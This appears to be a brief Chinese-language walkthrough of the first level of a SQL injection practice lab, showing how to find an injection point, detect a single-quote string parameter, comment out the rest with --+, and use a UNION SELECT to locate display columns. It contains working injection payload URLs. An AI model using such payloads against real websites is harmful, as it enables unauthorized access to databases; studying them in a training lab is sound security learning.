LESS—1
第一步:判断是否存在注入点
输入
/?id=1/?id=2
有数据返回且不同,存在注入
第二步:判断语句是否拼接,且是字符型还是数字型
输入
/id=1 and 1=2/?id=1'
出现报错,判断是字符型,说明是单引号,闭合则可以用 --+ 来注释掉后面的 ’
输入
/?id=1' and '1'='1/?id=1' and '1'='2
出现回显正常和无回显
输入
/?id=-1' union select 1,2,3 --+
使id报错,执行后面的语句,爆出显示位,用--+屏蔽后面的 ' 和部分语句
至此,开始捣乱!!!!!!